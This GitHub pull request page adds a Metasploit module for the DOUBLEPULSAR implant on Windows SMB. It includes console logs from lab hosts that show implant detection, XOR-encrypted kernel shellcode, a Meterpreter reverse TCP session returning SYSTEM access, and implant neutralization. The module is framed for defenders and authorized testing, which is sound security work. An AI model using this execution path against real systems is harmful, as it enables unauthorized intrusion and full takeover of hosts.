
Add DOUBLEPULSAR payload execution and neutralization module #12374

Merged
merged 22 commits into rapid7:master from wvu-r7:feature/doublepulsar on Oct 1, 2019

Conversation

@wvu-r7
Contributor

commented Sep 30, 2019

This module allows defenders and authorized attackers to test code execution against the DOUBLEPULSAR implant. It also allows users to neutralize the implant, preventing code execution unless the target is reinfected or otherwise exploited. This module will not provide the ability to infect a target with the implant, nor does it utilize any Equation Group code.

Pinging the implant

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >

Executing a payload

msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Neutralizing the implant

msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >
@busterb

Member

commented Oct 1, 2019

This definitely requires #12377 locally to run reliably; I'll grab them at the same time!

msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.101:445 - Encrypting shellcode with XOR key 0xC0C180C2
[*] 192.168.56.101:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.101:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49157) at 2019-10-01 01:33:54 -0500

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/doublepulsar_rce) > set target 
set target 0                    set target 1                    set target Execute\ payload     set target Neutralize\ implant
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant 
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.101:445 - Implant neutralization successful

[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) > 
msf5 exploit(windows/smb/doublepulsar_rce) > check 
[*] 192.168.56.101:445 - The target is not exploitable.
busterb added a commit that referenced this pull request Oct 1, 2019
…dule
busterb merged commit a1d1303 into rapid7:master Oct 1, 2019

3 checks passed:
- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed.
@busterb

Member

commented Oct 1, 2019

Release Notes

This adds a new module allowing defenders and authorized attackers to test code execution against the DOUBLEPULSAR implant. It also allows users to neutralize the implant, preventing code execution unless the target is reinfected or otherwise exploited. This module will not provide the ability to infect a target with the implant, nor does it utilize any Equation Group code.

wvu-r7 deleted the wvu-r7:feature/doublepulsar branch Oct 1, 2019
msjenkins-r7 added a commit that referenced this pull request Oct 2, 2019
…dule
@ronnieflip


commented Oct 4, 2019

Anyone reproduced this yet?
Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)

Exploit failed: undefined method `join' for "x64":String

@wvu-r7

Contributor Author

commented Oct 5, 2019

@ronnieflip: How did you install the module? #12377 is the fix for the core bug you're seeing, and it was merged into the tree at the same time as this PR.

@ronnieflip


commented Oct 5, 2019

Updated the PR and it worked fine. Thanks.
